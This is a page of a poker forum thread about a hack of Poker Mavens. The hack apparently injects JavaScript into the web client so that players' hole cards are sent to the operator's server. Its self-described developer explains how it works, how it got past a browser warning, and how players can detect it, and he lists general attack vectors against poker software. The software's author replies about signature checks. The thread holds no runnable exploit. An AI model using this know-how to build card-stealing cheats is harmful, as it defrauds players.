Page 2 of 3 FirstFirst 123 LastLast
Results 21 to 40 of 55

Thread: Poker Mavens software hacked to allow superusing for shady operators

  1. #21
    Owner Dan Druff's Avatar
    Reputation
    10110
    Join Date
    Mar 2012
    Posts
    54,626
    Blog Entries
    2
    Load Metric
    65638222
    Quote Originally Posted by DonaldTrumpsHairPiece View Post
    And the guys name is??????????
    I don't even know his name.

    It's some random guy from Lebanon who contacted me, erroneously believing I would want to buy this for the PFA room.

  2. #22
    Owner Dan Druff's Avatar
    Reputation
    10110
    Join Date
    Mar 2012
    Posts
    54,626
    Blog Entries
    2
    Load Metric
    65638222
    BUMP

    Two updates to this strange story.

    First off, the guy who has been trying to sell me the hack is STILL unaware of this thread, and just e-mailed me the following:

    good morning
    i have good news ... now u can know the flop turn river before they will be dealt so u can know who gonna win from the beginning of the hand
    i can let u test it also
    So it looks like you can do even better than superusing. You can have "clairvoyance" which is complete knowledge of the entire hand before it's dealt, which allows you to completely avoid bad beats. Wonderful, huh?

    The second update will be in the next post...

  3. #23
    Owner Dan Druff's Avatar
    Reputation
    10110
    Join Date
    Mar 2012
    Posts
    54,626
    Blog Entries
    2
    Load Metric
    65638222
    Second:

    The creator of the tool IS aware of this thread, and has contacted me. I will post his e-mail, and I will validate his account so he can speak for himself, as well.

    Hello, I am the developer of the hack that some person tried to sell to you, and I can see he was even using my website. I'd like to make a clarification on this forum in the thread related.

    Please note that I was not told that he was reselling the hack whatsoever, perhaps he was trying to resell in an unauthorized matter. Nevertheless, as I have seen on the thread that he has wanted to sell it for over 10k$. I was not paid merely half of it.

    Please allow me to post on the thread, as you can moderate it furthermore in case the post was not informative.

    Also, do note that the person I sold the hack to is not from Lebanon, yet I am, maybe there was some kind of identity theft?

    Thank you.
    I can verify this is really the creator of the hack.

  4. #24
    Platinum ftpjesus's Avatar
    Reputation
    587
    Join Date
    Mar 2012
    Location
    Mesa AZ
    Posts
    4,079
    Load Metric
    65638222
    Quote Originally Posted by Dan Druff View Post
    Second:

    The creator of the tool IS aware of this thread, and has contacted me. I will post his e-mail, and I will validate his account so he can speak for himself, as well.

    Hello, I am the developer of the hack that some person tried to sell to you, and I can see he was even using my website. I'd like to make a clarification on this forum in the thread related.

    Please note that I was not told that he was reselling the hack whatsoever, perhaps he was trying to resell in an unauthorized matter. Nevertheless, as I have seen on the thread that he has wanted to sell it for over 10k$. I was not paid merely half of it.

    Please allow me to post on the thread, as you can moderate it furthermore in case the post was not informative.

    Also, do note that the person I sold the hack to is not from Lebanon, yet I am, maybe there was some kind of identity theft?

    Thank you.
    I can verify this is really the creator of the hack.
    I would suggest you confirm the email address of the supposed creator with Kent Briggs. Reason is I caught who the guy was that was soliciting folks which included you and me. It’s a user named Carbon19 on the Briggsoft support forum. He slipped up and posted the email address he had emailed me from trying to solicit me for her software hack when he was trying to help somebody else with a seperate issue on the forum. He posted the same weird @gmail.com email account. I also know Kent said the regular registered email address Kent has on file for Carbon19 isn’t the same email address the user posted to contact him at in an open forum posting so don’t be to sure you aren’t getting played. I would cross check with Kent on the email address this creator gives you.

    So... I don’t see anything in the thread here that mentions the 10k so how did he know?? It was on the show. The only other mention of the 10k was my post on Briggsoft where I said I had sent evidence to Kent on the identity of the “seller” and that I wasn’t outting on the forum yet. So I’m gonna guess either they read or read the Briggsoft forum regularly which makes me suspicious still that Carbon19 is trying to pretend he’s two different people and knows nothing about the seller. But it also reinforces the party in question definitely is a Briggsoft forum regular.
    Last edited by ftpjesus; 02-10-2020 at 10:15 PM.

  5. #25
    Owner Dan Druff's Avatar
    Reputation
    10110
    Join Date
    Mar 2012
    Posts
    54,626
    Blog Entries
    2
    Load Metric
    65638222
    Quote Originally Posted by ftpjesus View Post
    Quote Originally Posted by Dan Druff View Post
    Second:

    The creator of the tool IS aware of this thread, and has contacted me. I will post his e-mail, and I will validate his account so he can speak for himself, as well.



    I can verify this is really the creator of the hack.
    I would suggest you confirm the email address of the supposed creator with Kent Briggs. Reason is I caught who the guy was that was soliciting folks which included you and me. It’s a user named Carbon19 on the Briggsoft support forum. He slipped up and posted the email address he had emailed me from trying to solicit me for her software hack when he was trying to help somebody else with a seperate issue on the forum. He posted the same weird @gmail.com email account. I also know Kent said the regular registered email address Kent has on file for Carbon19 isn’t the same email address the user posted to contact him at in an open forum posting so don’t be to sure you aren’t getting played. I would cross check with Kent on the email address this creator gives you.

    So... I don’t see anything in the thread here that mentions the 10k so how did he know?? It was on the show. The only other mention of the 10k was my post on Briggsoft where I said I had sent evidence to Kent on the identity of the “seller” and that I wasn’t outting on the forum yet. So I’m gonna guess either they read or read the Briggsoft forum regularly which makes me suspicious still that Carbon19 is trying to pretend he’s two different people and knows nothing about the seller. But it also reinforces the party in question definitely is a Briggsoft forum regular.
    I already verified that Kent on here is real.

  6. #26
    Cubic Zirconia
    Reputation
    11
    Join Date
    Feb 2020
    Posts
    4
    Load Metric
    65638222
    Hello,

    Allow me to introduce myself, although this is an unfortunate event, to provide some authenticity: I am a young developer who've had a history in developing (and reverse engineering) software, games, and auto-traders (for the forex/crypto market). (you can search up some of my other forum posts and sales on Google via my username, as this is not a self-advertising post, rather informative)

    Some small context I would have to state is that the person was dealt a trial version of the patched Poker Mavens cheat, he never obtained the full cheat as he did not finish his payments. I'm assuming he went online searching for people to sell this cheat to fund his own (while making money I see), as the $10k price tag was indeed above the limits for a simple card showing trick.

    Quote Originally Posted by ftpjesus View Post
    So... I don't see anything in the thread here that mentions the 10k so how did he know?? It was on the show. The only other mention of the 10k was my post on Briggsoft where I said I had sent evidence to Kent on the identity of the "seller" and that I wasn't outting on the forum yet. So I'm gonna guess either they read or read the Briggsoft forum regularly which makes me suspicious still that Carbon19 is trying to pretend he's two different people and knows nothing about the seller. But it also reinforces the party in question definitely is a Briggsoft forum regular.
    Although I do understand your concern, do note that I was able to get that price tag from the following post:
    Quote Originally Posted by Dan Druff View Post
    BTW, I feigned interest and the guy wanted $10k for his tool.

    Quote Originally Posted by Dan Druff View Post
    It's some random guy from Lebanon who contacted me, erroneously believing I would want to buy this for the PFA room.
    Please note that I am the one from Lebanon, I am not sure of what his nationality is, or whether he is from the same country or not, I do hope it was not identity theft as stated in my email.

    Quote Originally Posted by KBriggs View Post
    Note that if the hack was a modification/injection of javascript into the client module, that could be easily be detected. Since the browser loads the entire client code, (even though it is compressed) a byte for byte comparison against a clean site running the same version would make the hacked portion stand out like a sore thumb. And if that code was passing decrypted hole cards to an external server then you know it's a crooked site. Also using a packet sniffer like Wireshark to see if the client was making external connections to anything other than the File Port or Packet Port of the poker server would also be an indication that something was fishy.

    On the other hand if the hack is simply a passive memory scanner that resides entirely on the server then there's no way to detect that. Other than how Ultimate Bet/Absolute Poker was brought down where they got greedy and let their superuser win too much such that it defied statistical odds (if I recall that correctly).
    These words are indeed real and accurate, and I could not have said better otherwise. I will explain the hack provided and used by fellows among the community and ways to detect the cheating.

    Quote Originally Posted by Dan Druff View Post
    good morning
    i have good news ... now u can know the flop turn river before they will be dealt so u can know who gonna win from the beginning of the hand
    i can let u test it also
    So it looks like you can do even better than superusing. You can have "clairvoyance" which is complete knowledge of the entire hand before it's dealt, which allows you to completely avoid bad beats. Wonderful, huh?

    The second update will be in the next post...
    Although this may or may not be possible (subject for research), the person who had access to my trial version of the cheat was not able to do so (the reason is going to be stated below). Unless he was able to obtain a different cheat from elsewhere, I highly doubt clientside users can access such data beforehand. I did tell him I would try to exploit it for an extra fee, though.

    Now that certain things are cleared, I'd like to explain how to detect the vulnerability from the cheat (in case he had resold it to someone else) as he had violated the code of conduct that is supposed to be respected by both parties.

    Before I do so, I'd like to state that Poker Mavens is indeed secure, it was not as easy as other poker software I've gone through, hence went with a different approach, this one required me to reverse engineer the javascript code on the client-side to make a user send the content to someone else.

    In other words, what the hack does is change the code on each person opening Poker Mavens' browser page, like somewhat a 'spyware' in English, that checks what cards you received, then sends them to my server.

    After listening to PFA's radio, I've seen that Dan stated that Kent did not provide a way to know whether the webserver is infected as a client, although his quotation above does, but not in a visible matter.

    First, press Ctrl+Shift+I on Google Chrome, which will bring up the developer console. Press Sources, and select the javascript file of which contains the PokerMinJs javascript code.


    Press Ctrl+F to search, and type in 'ajax', this is served to POST/GET content to the server, note that other cheats may use a different method of intercepting and posting methods, but that was in my case.


    If you can find any $.ajax inside the code, do NOT play on that poker site, as it sends data to the owner on the hand of cards you own.

    Please note that PokerMavens is still on the safer end of other poker software out there, and fortunately, most cheats relating to that software is discoverable by the client. I am not saying it is entirely secure as such a thing does not exist, yet it is on the safer side.

    As Kent had stated, if the owner wants to cheat his clients, he WILL find a way to do so, please do not trust any poker website by its software (even those who are using very expensive software, some were easier to hack than PM itself). I respect this guy's code and ethics on not providing the card showing feature upon a client's request. (By making a good reputation out of his software and himself, and more work to fellow cheat developers like me -- just kidding). Any exposed cheat of mine that goes to ruin the reputation of the software/game will get exposed for fixing as I do not intend to destroy any persons' business on the bricks of building my own.

    I'd also like to state that this is not the only way to expose cheats as lots of clients do not load the JS code in such a way, ALL poker software is vulnerable to packet sniffing and memory dump attacks. Some are more secure than others, but the concept is still the same. In the most extreme cases, you can send a replica of your screen to the attacker, making the superuser see what you can see on the table. (this works on almost all online web-based software)

    In PM's case, the data was very well secured from packet intercepting as well, making my job slightly harder:
    Command: "ECards"
    Table: "Ring Game #01"
    Type: "R"
    Salt: "02B18FA165BF3C2F"
    Hand: "22-1"
    Card1: "2C"
    Card2: "98"
    Card3: "64"
    Card4: "0A"
    Card5: "9A"
    Show: "No"
    It does seem he had taken extra precaution on the sniffers, you can always decrypt it with the provided salt, but you'll not be able to intercept them mid-session as it uses the WebSocket's Seed as another key. (which makes packet sniffers less effective in Poker Mavens)

    How could Kent fix this? Several ways, one of the common ways is to double-check the JS file's hash before posting it on the server; another would check the hash of the whole program to prevent its tampering. But I deem this as useless because a hacker will always find a way to hack in ANY ways possible. I suggest only playing poker in trusted real-life casinos, and not through the screen of your computer unless you completely trust the person hosting.

    Do not hesitate to ask any questions regarding this or any other related topic.
    Stay safe!

     
    Comments
      
      Crowe Diddly: informative post from Lebanon rep
    Last edited by Johnaudi; 02-11-2020 at 02:59 AM.

  7. #27
    Owner Dan Druff's Avatar
    Reputation
    10110
    Join Date
    Mar 2012
    Posts
    54,626
    Blog Entries
    2
    Load Metric
    65638222
    Hi John,

    Thanks for your very detailed and informative post.

    The Lebanon info came from looking at your server, where he had me log in so I could view the cheat tool. I didn't bother looking up this guy's IP, though I could do that also. I assumed at the time they were both him, so I didn't bother looking up the other IP.

    Can you explain what was the point of this modified PokerMavens if you were not intending for people to be cheated? What would be the point of developing such a thing otherwise?

    Also, have you ever worked on developing holecard spy hacks for Kings Club or Neighborhood Club?

  8. #28
    Cubic Zirconia
    Reputation
    11
    Join Date
    Feb 2020
    Posts
    4
    Load Metric
    65638222
    Quote Originally Posted by Dan Druff View Post
    Can you explain what was the point of this modified PokerMavens if you were not intending for people to be cheated? What would be the point of developing such a thing otherwise?

    Also, have you ever worked on developing holecard spy hacks for Kings Club or Neighborhood Club?
    This was a freelancer project of which I had been contacted to create. Please note that I am getting paid to do such software, harm is meant to be dealt from the host himself, whether I took the project or someone else. Rather take it whilst getting paid than letting someone else take it.

    For the latter question; I am in no position to give an answer at the moment, yet I did state not to give blind trust to any poker software. I'm not saying that the software you stated are vulnerable, nor am I stating that they are not

    Let us assume X software is a million dollar software with no security loop hole (which is not bound to exist). The software itself is not vulnerable, but capturing data from the users' browser is. Whether it is to an external server or not, you can even transfer plain HTML code in case the JavaScript is completely secured. (Which, again, is in theory and does not exist to this date)

    The cheat created for poker maven's of which I exploited above does use a similar system. It is up to the user to figure it out! Chrome already implemented a security feature for such:
    At first, I was sending the username as text to my web server, Google Chrome itself told the webpage user that the website is sending raw data of your username over the web and is not secured. My workaround was to encrypt the username and decrypt it on the server which made it bypass Chrome's protection. I cannot stress this enough, loopholes do and will always exist.

    I do know it is not Dan's objective to diminish Poker Maven's sales by stating it is vulnerable yet to tell the world that it is as a fact. I would rather if we could translate this from "PM's Vulnerable to its host hack" to "Any Poker software is vulnerable and can be manipulated by its host".

    Not only am I targeting the web server or computer based community, but the poker "arcades" and electronic casinos you can go to. I have worked with assembly based software on those electronic poker machines, and some do contain a winning ratio percentage. (And the ones that do not can be reverse engineered)

    I cannot stress this enough. Please stay safe and trust the host before you proceed by playing anywhere.
    Last edited by Johnaudi; 02-11-2020 at 04:02 AM.

  9. #29
    Cubic Zirconia
    Reputation
    12
    Join Date
    Feb 2020
    Posts
    13
    Load Metric
    65638222
    Quote Originally Posted by Johnaudi View Post
    How could Kent fix this? Several ways, one of the common ways is to double-check the JS file's hash before posting it on the server; another would check the hash of the whole program to prevent its tampering.
    That was actually done a few upgrades ago (6.12), I just didn't announce it. The EXE now validates its own digital signature. That will fail if any modification has been made, including the embedded JS client code, and the program will shut down. But code running on the hacker's own hardware can always be hacked and patched, such that those protections are stripped out. So there are no guarantees.

  10. #30
    Cubic Zirconia
    Reputation
    12
    Join Date
    Feb 2020
    Posts
    13
    Load Metric
    65638222
    Quote Originally Posted by KBriggs View Post
    I just didn't announce it.
    Actually I did: http://www.briggsoft.com/forums/view...php?f=7&t=2830

  11. #31
    Cubic Zirconia
    Reputation
    11
    Join Date
    Feb 2020
    Posts
    4
    Load Metric
    65638222
    Quote Originally Posted by KBriggs View Post
    That was actually done a few upgrades ago (6.12), I just didn't announce it. The EXE now validates its own digital signature. That will fail if any modification has been made, including the embedded JS client code, and the program will shut down. But code running on the hacker's own hardware can always be hacked and patched, such that those protections are stripped out. So there are no guarantees.
    This is interesting, perhaps assembled code, is that working on resources as well? As it has compiled with no issues. (Server running as well)

    I can provide an example of patched exe to you privately if that is in your interest.

  12. #32
    Cubic Zirconia
    Reputation
    12
    Join Date
    Feb 2020
    Posts
    13
    Load Metric
    65638222
    Quote Originally Posted by Johnaudi View Post
    This is interesting, perhaps assembled code, is that working on resources as well? As it has compiled with no issues. (Server running as well)
    Hmm, now that I look at that code it appears I'm only checking that the signature belongs to Briggs Softworks and not if the code has been modified. Could have sworn I tested that. Anyway, I'll fix that in 6.15. Note that this will not protect against a passive memory scan for the card deck, which is what would be required to know the community cards in advance (if that claim is true).

  13. #33
    Cubic Zirconia
    Reputation
    12
    Join Date
    Feb 2020
    Posts
    13
    Load Metric
    65638222
    Dan, I just listened to the section of your podcast where this was being discussed and wanted to address a few things you mentioned. When I said that a code injection into the client could be easily detected, I meant easily detected by any player who knew what to look for, not the site operator. When you load the client interface, the HTML and Javascript is now all in your browser. You can see it by pressing Ctrl-U in most browsers. And you can even save it to a file on your local drive. Also when I said that you can run a free packet sniffer like Wireshark to see if the browser is making external connections, it's the player that can do that themselves so they can detect if they have a modified client that is sending their decrypted hole cards back to a shady operator.

    The other issue is that you thought the server module could be written in some tamperproof way via encryption. Not really. Before I was into poker I was really into cryptography and still sell a couple of crypto apps. A talented hacker that has the server program running on their hardware can reverse engineer the machine code, line by line. The cards have to exist in plaintext form at some point before the encryption can occur. Given enough time, patience, and skill, said hacker could find this point. The best the code author could do is throw in a bunch of obfuscation points to make it more difficult to find but obfuscation is not real security.

    One last comment about established poker sites running proprietary software. If the site operators were corrupt, that proprietary software would be the easiest to corrupt because they wrote it themselves. They have the source code and could put the cheating system in as a feature. And no one would know because no one else is going be running around trying to sell the hack. The only system that you know for certain is on the up-and-up is one you run yourself.

  14. #34
    Silver
    Reputation
    136
    Join Date
    May 2013
    Posts
    862
    Load Metric
    65638222
    Quote Originally Posted by KBriggs View Post
    Quote Originally Posted by Sidewinder View Post
    It sounds nuts, but making this tool available is way better than pretending like it doesn’t exist and letting someone else profit off your hard programming work.
    I care less about the profiting of the hacker. I'm more concerned about the scumbags who would install it on their own server to cheat their own customers. I'm not about to make that easier to do. It's bad for business and bad for the reputation of poker in general.
    Well if you are going to ignore the situation i am not sure what the purpose of you even responding is. You claim it can't be stopped and you claim you aren't going to make a similiar tool available to at least stop others profiting from your hard work so what exactly is the point of you being informed or even responding to the availability of this tool?

    Is there some other option?

     
    Comments
      
      duped_samaritan: ?

  15. #35
    Cubic Zirconia
    Reputation
    12
    Join Date
    Feb 2020
    Posts
    13
    Load Metric
    65638222
    Quote Originally Posted by Sidewinder View Post
    Well if you are going to ignore the situation
    I'm not ignoring anything, I'm just clarifying the problem. It's definitely a problem.

    You claim it can't be stopped and you claim you aren't going to make a similar tool available to at least stop others profiting from your hard work so what exactly is the point of you being informed or even responding to the availability of this tool?
    Of course I'm not going to make a tool to promote the corruption of my own software and screw over every honest customer I have just to spite some hacker. That would be the dumbest possible thing I could do.

  16. #36
    Cubic Zirconia
    Reputation
    11
    Join Date
    Feb 2020
    Posts
    4
    Load Metric
    65638222
    Quote Originally Posted by Sidewinder View Post
    Well if you are going to ignore the situation i am not sure what the purpose of you even responding is. You claim it can't be stopped and you claim you aren't going to make a similiar tool available to at least stop others profiting from your hard work so what exactly is the point of you being informed or even responding to the availability of this tool?

    Is there some other option?
    This is may be the third time I try to explain this.

    Please note that he did fix the signature check in the next version as a first step. It is impossible for him to prevent all the security loopholes, whether included or not in the following list:
    • Exploiters can inject or change the string of the file in live memory, of which he'll need to continuously set checks for that.
    • In case your connection is not HTTPS, the server data can be disrupted upon request.
    • They can listen to all websockets going out upon connectivity (making all data between both users transparent), of which he'll need to use a different protocol of security.
    • They can search up live the memory to get the values needed, of which he could possibly obfuscate.
    • They can pointer scan to changing variables in case it was obfuscated, the variable has to exist at some point, of which the exploiter can force his own as well in this case.
    • The exploiter can create his own randomizer and have it injected, thus making his own rules go through.
    • SQL injection which can allow the reading of all data that may be hidden in the DB. (whether card data, or others)
    • Force a header file for the client users to send data to the same server (hence, no outgoing websockets to an unknown server).
    • And much, much, much more.

    Most of these exploits exist in all poker platforms. Fixing one, or many for that matter, would result in a workaround for the hack developer, and a merely un-debuggable (or hard to understand and use) code by the developer.

  17. #37
    Platinum ftpjesus's Avatar
    Reputation
    587
    Join Date
    Mar 2012
    Location
    Mesa AZ
    Posts
    4,079
    Load Metric
    65638222
    Quote Originally Posted by Sidewinder View Post
    Quote Originally Posted by KBriggs View Post

    I care less about the profiting of the hacker. I'm more concerned about the scumbags who would install it on their own server to cheat their own customers. I'm not about to make that easier to do. It's bad for business and bad for the reputation of poker in general.
    Well if you are going to ignore the situation i am not sure what the purpose of you even responding is. You claim it can't be stopped and you claim you aren't going to make a similiar tool available to at least stop others profiting from your hard work so what exactly is the point of you being informed or even responding to the availability of this tool?

    Is there some other option?
    Why the hell would Kent make a tool to do exactly what this hack is doing?? That’s like saying let’s sell gasoline and glass bottles to the folks who want to riot and start fires because somebody’s already doing it.

  18. #38
    Platinum ftpjesus's Avatar
    Reputation
    587
    Join Date
    Mar 2012
    Location
    Mesa AZ
    Posts
    4,079
    Load Metric
    65638222
    One thing many have missed is what John Audi said that in reality PM is more secure then other poker software he’s seen. That should be telling to many folks. Basically if you trust the site owner or company then you have nothing to worry about because it’s even easier for exploits to happen on bigger names and were not talking just UB/AP either.

  19. #39
    Platinum FRANKRIZZO's Avatar
    Reputation
    482
    Join Date
    Sep 2014
    Posts
    3,393
    Load Metric
    65638222
    I think Willie Stole has found the backdoor.

  20. #40
    Cubic Zirconia
    Reputation
    13
    Join Date
    Jul 2017
    Posts
    14
    Load Metric
    65638222
    All of this technical jargon is 75% over my head but is it possible for this to happen on a site like nitrogen with the provably fair stuff? I'm assuming this also works with games with more than 2 hole cards (Omaha etc)?

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Replies: 11
    Last Post: 04-12-2022, 08:37 AM
  2. Worst online poker software ever?
    By Dan Druff in forum Poker Community Discussion
    Replies: 29
    Last Post: 05-30-2019, 10:52 AM
  3. How We Learned to Cheat at Online Poker: A Study in Software Security
    By mulva in forum Poker Community Discussion
    Replies: 3
    Last Post: 08-09-2017, 05:32 PM
  4. clickngamble.com poker software
    By jfava16 in forum Scams, Scandals, and Shadiness
    Replies: 0
    Last Post: 08-06-2014, 06:14 PM
  5. LVH opens poker room with UB shady fuck as manager
    By ftpjesus in forum Flying Stupidity
    Replies: 1
    Last Post: 07-13-2013, 12:36 AM